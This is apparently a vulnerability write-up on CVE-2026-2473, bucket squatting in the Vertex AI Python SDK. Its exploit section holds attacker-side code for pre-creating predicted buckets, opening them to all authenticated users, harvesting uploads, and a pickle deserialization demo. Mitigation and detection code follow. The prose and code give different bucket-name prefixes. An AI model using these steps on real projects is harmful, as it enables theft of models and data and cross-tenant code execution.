
CVE-2026-2473 · CVSS 7.7

Bucket Squatting on Google Vertex AI: Stealing Models with Predictable Names

Alon Barad, Software Engineer

Feb 21, 2026 · 6 min read

PoC Available

Executive Summary (TL;DR)

The Vertex AI SDK generated predictable GCS bucket names. Attackers could create these buckets first (squatting). Victim data goes to attacker; attacker code goes to victim. Update SDK to v1.133.0+.

A classic 'Bucket Squatting' vulnerability in the Google Cloud Vertex AI SDK allows an attacker with no access to the victim's project to hijack the default storage used by machine learning experiments. By predicting the name of the Google Cloud Storage (GCS) bucket that the SDK automatically generates from the victim's Project ID and region, an attacker can pre-create this bucket in their own tenant. When the victim initializes their Vertex AI environment using default settings, their proprietary models, datasets, and training logs are unwittingly uploaded to the attacker's infrastructure. Furthermore, this channel can be reversed to inject malicious serialized objects, leading to Cross-Tenant Remote Code Execution (RCE).

The Hook: Defaults Are the Devil's Playground

In the world of MLOps, friction is the enemy. Data scientists want to train models, not provision infrastructure. Google knows this, which is why the Vertex AI SDK (google-cloud-aiplatform) is packed with 'magic' defaults. When you initialize an experiment using aiplatform.init(), you don't have to specify a staging bucket. The SDK, in its infinite helpfulness, says, "Don't worry, I'll handle the plumbing."

And here lies the problem. Automation requires predictability. For the SDK to automatically find or create a bucket for your project without asking you for a name, it must use a deterministic algorithm to generate that name. It combines a static prefix with your Google Cloud Project ID and your region.

But in the cloud, convenience is often a backdoor. Because Google Cloud Storage (GCS) operates on a single, global namespace, bucket names must be unique across all Google customers. If I know what your bucket is going to be named before you do, and I create it first, I own it. It doesn't matter that it contains your Project ID in the string. Possession is nine-tenths of the law, and in GCS, the account that creates the bucket owns the IAM policy.

The Flaw: A Global Namespace Collision

The vulnerability (CWE-340: Predictability Problems) stems from how python-aiplatform constructed these default names. Prior to version 1.133.0, the logic was effectively:

bucket_name = f"vertex-ai-experiments-{project_id}-{region}"

This string is entirely predictable. Project IDs are often public or easily guessable (e.g., company-name-prod, startup-dev). The region is usually one of the major hubs (like us-central1).

The flaw isn't just in the naming; it's in the verification. When the SDK initializes, it performs a check: "Does this bucket exist?" If the answer is "No," it creates it. If the answer is "Yes," it assumes the bucket belongs to the user and proceeds to upload sensitive artifacts. It failed to verify ownership.

This is the digital equivalent of mailing your tax returns to an address you found in the phone book without checking who actually lives there. If an attacker has already moved into 123 Vertex Lane, they are going to get your mail.

The Code: Reading the Tea Leaves

Let's look at the logic flow that enabled this. The vulnerable code path relied on standard GCS API calls that are indiscriminate regarding tenant boundaries.

The Vulnerable Logic (Conceptual):

# pseudo-code of the pre-patched logic (conceptual, not the exact upstream source)
from google.cloud import storage

def get_default_bucket(project_id, region):
    storage_client = storage.Client(project=project_id)

    # 1. Deterministic Name Generation: fully derived from public values
    name = f"vertex-ai-cloud-ml-{project_id}-{region}"
    bucket = storage_client.bucket(name)

    # 2. The Check-and-Use Race: only existence is tested, never ownership
    if not bucket.exists():
        bucket.create(project=project_id, location=region)

    # 3. Implicit Trust: the bucket is returned even if another tenant created it
    return bucket

The fix introduced in version 1.133.0 does two critical things: it adds entropy to the name (making it impossible to guess) and validates the project number of the bucket owner.

The Fix (Conceptual):

# pseudo-code of the patched logic (conceptual, not the exact upstream source)
def get_default_bucket(project_id, region, current_project_number):
    # 1. Verification of Ownership: an existing default bucket must belong to us
    bucket = lookup_existing_default_bucket(project_id, region)
    if bucket is not None:
        if bucket.project_number != current_project_number:
            raise SecurityException("Bucket exists but belongs to another project!")
        return bucket

    # 2. Entropy (if creating new): a random suffix makes the name unguessable
    suffix = random_string(8)
    name = f"vertex-ai-{project_id}-{region}-{suffix}"
    return create_bucket(name)

By enforcing an ownership check, the SDK ensures that even if a squatter did guess the name, the client would refuse to upload data to it.

The Exploit: Hijacking the Pipeline

Exploiting this requires no special tools—just a valid GCP account and a bit of patience. Here is how an attacker executes the "Bucket Squatting" attack against a target organization.

Phase 1: Reconnaissance

The attacker identifies target Project IDs. This is easier than it sounds. They can be found in public GitHub repositories (embedded in config files), client-side JavaScript on public websites, or simply guessed (uber-internal-ml, openai-test-us).

Phase 2: The Land Grab

The attacker uses a script to iterate through common regions (us-central1, europe-west4, asia-east1) and creates the predicted buckets in their own malicious GCP project.

# Attacker creates the trap
gsutil mb gs://vertex-ai-cloud-ml-targetcorp-prod-us-central1
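
The land grab is easy to script. Below is a minimal attacker-side sketch using the google-cloud-storage client; the project IDs and region list are placeholders, and the naming pattern follows the conceptual logic above:

# Illustrative sketch: pre-create every predicted bucket inside the attacker's
# own project. Whoever creates the bucket owns its IAM policy.
from google.cloud import storage

client = storage.Client(project="attacker-project")  # attacker-controlled project
target_project = "targetcorp-prod"                   # guessed victim Project ID

for region in ["us-central1", "europe-west4", "asia-east1"]:
    name = f"vertex-ai-cloud-ml-{target_project}-{region}"
    try:
        client.create_bucket(name, location=region)
        print(f"Squatted {name}")
    except Exception as exc:
        print(f"Skipped {name}: {exc}")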

Phase 3: The Honey Pot Configuration

The attacker must allow the victim to write to this bucket. They update the IAM policy to grant roles/storage.objectAdmin to allAuthenticatedUsers. This sounds noisy, but since the bucket name is specific to the victim, random internet users aren't likely to stumble upon it. Only the victim's SDK will try to access it. A sketch of that IAM change is shown below.
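
A minimal sketch of that grant using the google-cloud-storage client; the bucket name and attacker project are placeholders:

# Illustrative sketch: open the squatted bucket to any authenticated Google
# account so the victim's SDK is able to upload artifacts into it.
from google.cloud import storage

client = storage.Client(project="attacker-project")
bucket = client.get_bucket("vertex-ai-cloud-ml-targetcorp-prod-us-central1")

policy = bucket.get_iam_policy(requested_policy_version=3)
policy.bindings.append({
    "role": "roles/storage.objectAdmin",
    "members": {"allAuthenticatedUsers"},
})
bucket.set_iam_policy(policy)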

Phase 4: Execution

The victim runs their daily training job:

aiplatform.init(project="targetcorp-prod", location="us-central1")
# The SDK finds the attacker's bucket and links it.

As the training job runs, it uploads model.joblib, dataset.csv, and logs containing hyperparameters directly to the attacker's storage.
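
From the attacker's side, collecting the loot is nothing more than a bucket listing. A sketch, again with placeholder names:

# Illustrative sketch: watch what the victim's pipeline drops into the trap.
from google.cloud import storage

client = storage.Client(project="attacker-project")
bucket = client.bucket("vertex-ai-cloud-ml-targetcorp-prod-us-central1")

for blob in bucket.list_blobs():
    print(blob.name, blob.size, blob.updated)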

The Impact: From Theft to RCE

The immediate impact is a Confidentiality Breach. Machine learning models are often the "crown jewels" of tech companies, costing millions in compute time to train. An attacker gets a free copy. They also get the training data, which often contains PII or sensitive financial records.

However, the Integrity and RCE impacts are darker. Vertex AI experiments often reload artifacts. If the pipeline includes a step to validate the model or deploy it, the SDK pulls the object back from the bucket.

Since the attacker owns the bucket, they can replace the legitimate model.pkl with a malicious pickle file. When the victim's Python process deserializes this object to "evaluate" the model, the attacker's payload executes. This grants the attacker code execution inside the victim's Vertex AI environment—a trusted, internal network zone that likely has access to other databases and secrets.
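
The mechanism is plain pickle behavior, nothing Vertex-specific. A deliberately harmless sketch of why loading an untrusted artifact is equivalent to running the attacker's code:

# The payload below only prints a message; a real attacker would substitute an
# arbitrary command. __reduce__ tells pickle what to call during unpickling.
import pickle

class PoisonedModel:
    def __reduce__(self):
        return (print, ("arbitrary code running inside the victim's pipeline",))

payload = pickle.dumps(PoisonedModel())

# Victim side: "loading the model" triggers the payload before any evaluation.
pickle.loads(payload)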

Mitigation: Trust No One (Not Even Defaults)

The primary fix is to upgrade the google-cloud-aiplatform library to version 1.133.0 or later immediately. This version introduces the "Project Validation" check that kills this attack vector dead.

However, as a general security practice, relying on SDK defaults for infrastructure resources is a bad habit. Security teams should enforce explicit bucket declarations.

Secure Initialization:

# Don't do this:
# aiplatform.init(project=...)
 
# Do this:
aiplatform.init(
    project="my-project",
    location="us-central1",
    staging_bucket="gs://my-manually-secured-bucket-v1"
)

Additionally, organizations should run scans using tools like stratus-red-team or custom scripts to identify if any existing buckets used by their AI pipelines are hosted in projects they do not own. If you see data flowing to a bucket you can't see in your own Cloud Console, you have a problem.
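
As a rough starting point for such a scan, the check below verifies that the predictable default bucket for a project, if it exists, is actually owned by that project. The project ID, project number, and naming pattern are assumptions:

# Defensive sketch: does the predictable default bucket belong to us?
from google.api_core.exceptions import Forbidden, NotFound
from google.cloud import storage

PROJECT_ID = "my-project"        # placeholder
PROJECT_NUMBER = 123456789012    # your numeric project number (placeholder)
REGION = "us-central1"

client = storage.Client(project=PROJECT_ID)
name = f"vertex-ai-cloud-ml-{PROJECT_ID}-{REGION}"

try:
    bucket = client.get_bucket(name)
    if bucket.project_number != PROJECT_NUMBER:
        print(f"ALERT: {name} exists but is owned by project {bucket.project_number}")
    else:
        print(f"OK: {name} belongs to this project")
except NotFound:
    print(f"{name} does not exist; pin staging_bucket explicitly or reserve the name")
except Forbidden:
    print(f"ALERT: {name} exists in another tenant and denies metadata access")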

Official Patches

Google: Official SDK Release v1.133.0


Technical Appendix

CVSS Score
7.7 / 10
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Affected Systems

Google Cloud Vertex AI (python-aiplatform SDK)

Affected Versions Detail

Product: google-cloud-aiplatform (Google)
Affected Versions: >= 1.21.0, < 1.133.0
Fixed Version: 1.133.0

CWE: CWE-340 (Predictability Problems)
CVSS: 7.7 (High)
Attack Vector: Network (Pre-allocation)
Privileges Required: None
Impact: Data Exfiltration & RCE
Exploit Status: PoC / Method Known

MITRE ATT&CK Mapping

T1584.004: Compromise Infrastructure: Serverless (Resource Development)
T1565.001: Stored Data Manipulation (Impact)
T1537: Transfer Data to Cloud Account (Exfiltration)

CWE-340: Generation of Predictable Numbers or Identifiers

The software generates a predictable identifier for a resource, allowing an attacker to pre-create or guess the identifier to hijack the resource.

Known Exploits & Detection

Wiz Research: Original research detailing the bucket squatting vector in Vertex AI.

Vulnerability Timeline

2026-01-08: Fixed version 1.133.0 released by Google
2026-02-20: Public disclosure and CVE-2026-2473 assigned

References & Sources

  • [1] Google Cloud Security Bulletin GCP-2026-012
  • [2] Python Vertex AI SDK Repository

Attack Flow Diagram
